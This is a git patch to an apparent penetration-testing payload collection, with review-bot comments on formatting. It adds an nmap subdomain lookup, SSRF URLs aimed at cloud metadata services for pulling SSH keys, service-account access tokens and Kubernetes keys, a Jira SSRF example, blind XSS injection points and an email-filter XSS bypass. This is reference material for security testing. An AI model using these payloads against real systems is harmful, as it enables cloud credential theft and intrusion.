From 928a45453143c2688d61ff03c2352fbb9414b82d Mon Sep 17 00:00:00 2001 From: Swissky Date: Sun, 25 Nov 2018 15:44:17 +0100 Subject: [PATCH] Blind XSS endpoint + SSRF Google + Nmap subdomains --- .../Subdomains Enumeration.md | 7 +++++++ SSRF injection/README.md | 9 +++++++++ XSS injection/README.md | 14 ++++++++++++++ 3 files changed, 30 insertions(+) diff --git a/Methodology and Resources/Subdomains Enumeration.md b/Methodology and Resources/Subdomains Enumeration.md index f530b8f..72fff2d 100644 --- a/Methodology and Resources/Subdomains Enumeration.md +++ b/Methodology and Resources/Subdomains Enumeration.md @@ -12,6 +12,7 @@ * Aquatone (Ruby and Go versions) * AltDNS * MassDNS + * Nmap * Subdomain take over * tko-subs * HostileSubBruteForcer @@ -144,6 +145,12 @@ DNS_RESOLVERS="./resolvers.txt" cat /tmp/results_subfinder.txt | massdns -r $DNS_RESOLVERS -t A -o S -w /tmp/results_subfinder_resolved.txt ``` +### Using Nmap + +```powershell +nmap -sn --script hostmap-crtsh host_to_scan.tld +``` + ## Subdomain take over Check [Can I take over xyz](https://github.com/EdOverflow/can-i-take-over-xyz) by EdOverflow for a list of services and how to claim (sub)domains with dangling DNS records. diff --git a/SSRF injection/README.md b/SSRF injection/README.md index cb36b30..dfcdb30 100644 --- a/SSRF injection/README.md +++ b/SSRF injection/README.md @@ -330,6 +330,8 @@ http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy ``` +E.g: Jira SSRF leading to AWS info disclosure - `https://help.redacted.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/metadata/v1/maintenance` + ### SSRF URL for Google Cloud Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" 
@@ -356,6 +358,12 @@ http://metadata.google.internal/computeMetadata/v1beta1/ http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true ``` +Interesting files to pull out: + +- SSH Public Key : `http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json` +- Get Access Token : `http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token` +- Kubernetes Key : `http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json` + ### SSRF URL for Digital Ocean Documentation available at `https://developers.digitalocean.com/documentation/metadata/` @@ -478,3 +486,4 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se - [How I convert SSRF to xss in a ssrf vulnerable Jira](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158) - [Piercing the Veil: Server Side Request Forgery to NIPRNet access](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a) - [Hacker101 SSRF](https://www.youtube.com/watch?v=66ni2BTIjS8) +- [SSRF脆弱性を利用したGCE/GKEインスタンスへの攻撃例](https://blog.ssrf.in/post/example-of-attack-on-gce-and-gke-instance-using-ssrf-vulnerability/) \ No newline at end of file diff --git a/XSS injection/README.md b/XSS injection/README.md index ad8fa78..82f8620 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md @@ -325,6 +325,14 @@ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursu - [BlueLotus_XSSReceiver - FiresunCN](https://github.com/firesunCN/BlueLotus_XSSReceiver) - [ezXSS - ssl](https://github.com/ssl/ezXSS) +### Blind XSS endpoint + +- Contact forms +- Ticket support +- Referer Header + - Custom Site Analytics + - Administrative Panel logs + ## Polyglot XSS Polyglot XSS - 0xsobky 
@@ -507,6 +515,12 @@ $ echo "" | xxd 00000010: 6572 7428 3129 0c3e 0a ert(1).>. ``` +Bypass email filter ([RFC compliant](http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate)) + +```javascript +">"@x.y +``` + Bypass document blacklist ```javascript
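Review bot: In the `Subdomains Enumeration.md` hunk under `### Using Nmap`, the fence is tagged `powershell` although the command is a plain `nmap` invocation that runs the same in any shell; tag it `bash` (or leave it untagged) so it matches the other command fences in this file. It would also help the reader to say in one line what the `hostmap-crtsh` script does (it queries certificate transparency logs via crt.sh for names on issued certificates, so it is a passive lookup and does not touch the target's DNS), since the heading alone suggests an active scan.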
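Review bot: In the `SSRF injection/README.md` hunk at `@@ -330,6 +330,8 @@`, the example URL uses the path `/metadata/v1/maintenance`, which does not follow the AWS `/latest/meta-data/...` layout listed directly above it and instead looks like the `/metadata/v1/` layout that the Digital Ocean section of this same file covers; either change the description from "AWS info disclosure" to match the path or switch the example to an AWS path such as `http://169.254.169.254/latest/meta-data/`. Minor: `E.g:` should be `E.g.:`.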
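Review bot: In the `SSRF injection/README.md` hunk at `@@ -356,6 +358,12 @@`, the section intro (visible as context in the previous hunk) states that the Google endpoints require the `Metadata-Flavor: Google` or `X-Google-Metadata-Request: True` header, yet the three "Interesting files" all use the legacy `v1beta1` path; a one-line note that `v1beta1` is listed precisely because it does not enforce that header would remove the apparent contradiction and make clear that the fix on the defending side is to disable the legacy endpoints. Style: drop the space before the colons in `SSH Public Key :`, `Get Access Token :` and `Kubernetes Key :`.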
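Review bot: In the `SSRF injection/README.md` hunk at `@@ -478,3 +486,4 @@`, the new reference line is added without a trailing newline (`\ No newline at end of file`); add one so the next edit to this list produces a clean diff. Since the rest of the list is in English, consider adding an English gloss after the Japanese title, which per the URL slug is roughly "Example of an attack on GCE/GKE instances using an SSRF vulnerability".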
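Review bot: In the `XSS injection/README.md` hunk at `@@ -325,6 +325,14 @@`, the heading `### Blind XSS endpoint` introduces a list of several places, so `### Blind XSS endpoints` reads better; and because the list mixes input locations (`Contact forms`, `Ticket support`) with a header (`Referer Header`) whose value is rendered elsewhere, a short sentence saying that these are places where submitted input is later displayed to an internal user (which is why the injection is "blind") would make the section self-explanatory.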
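Review bot: In the `XSS injection/README.md` hunk at `@@ -507,6 +515,12 @@`, the fence around `">"@x.y` is tagged `javascript` but its content is an e-mail address, not JavaScript; use an untagged fence or `text`, and say in the lead sentence that the point is that a quoted local part is valid under the RFC (as the linked validator confirms) so a filter that only checks address syntax will let the `"` and `>` through.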